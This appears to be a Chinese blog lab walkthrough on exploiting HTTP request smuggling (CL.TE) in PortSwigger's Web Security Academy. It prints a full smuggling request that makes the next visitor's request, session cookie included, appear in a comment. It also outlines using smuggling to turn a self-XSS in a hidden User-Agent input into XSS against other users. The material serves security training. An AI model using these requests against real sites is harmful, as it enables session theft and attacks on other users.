http走私漏洞学习(1)--http走私简介
http走私漏洞学习(2)--http走私常见方法
http走私漏洞学习(3)--http走私漏洞利用
靶场地址:https://portswigger.net/web-security/request-smuggling/lab-basic-cl-te
以cl-te方式为例,简单演示漏洞利用
留言处窃取请求数据
随意留言抓包,修改数据包POST / HTTP/1.1 Host: ac651fdf1ff9308c80dd0e3400a10070.web-security-academy.net Connection: close Content-Length: 886 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: https://ac651fdf1ff9308c80dd0e3400a10070.web-security-academy.net Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.113 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: https://ac651fdf1ff9308c80dd0e3400a10070.web-security-academy.net/post?postId=4 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: session=ChTrMNa7wvzEl67A3hXnHGlHK9bhoVXG Transfer-Encoding: chunked 0 POST /post/comment HTTP/1.1 Host: ac651fdf1ff9308c80dd0e3400a10070.web-security-academy.net Connection: close Content-Length: 1020 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: https://ac651fdf1ff9308c80dd0e3400a10070.web-security-academy.net Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.113 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: https://ac651fdf1ff9308c80dd0e3400a10070.web-security-academy.net/post?postId=4 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: session=ChTrMNa7wvzEl67A3hXnHGlHK9bhoVXG csrf=9TwQhCEYJGWu3I65LSTEZjdVRHBuOzdk&postId=4&name=11111&email=test%40163.com&website=&comment=走私数据中CL的值需要根据具体情况调节大小,才能看到cookie
提交数据,‘0’以下的数据会走私到下一个数据包中
下一个数据包将被拼合成:POST /post/comment HTTP/1.1 Host: ac651fdf1ff9308c80dd0e3400a10070.web-security-academy.net ..... csrf=9TwQhCEYJGWu3I65LSTEZjdVRHBuOzdk&postId=4&name=11111&email=test%40163.com&website= &comment=POST /post/comment HTTP/1.1 xxxxcomment为留言数据,意味着走私后下一个数据包的内容将显示在留言中
现在我们将数据包提交,回到留言处随意输入东西
显示出错,刷新一下
下一个用户数据包内容显示在留言中,成功看到cookie
靶场地址:
有一处隐藏的input带有UA
尝试修改UA,插入xss,
触发js代码,典型的我打我自己型xss
利用http走私弄成我打别人型xss
提交后随意刷新页面,触发xss
总的来说利用的局限性很大,攻击到谁完全就是随缘
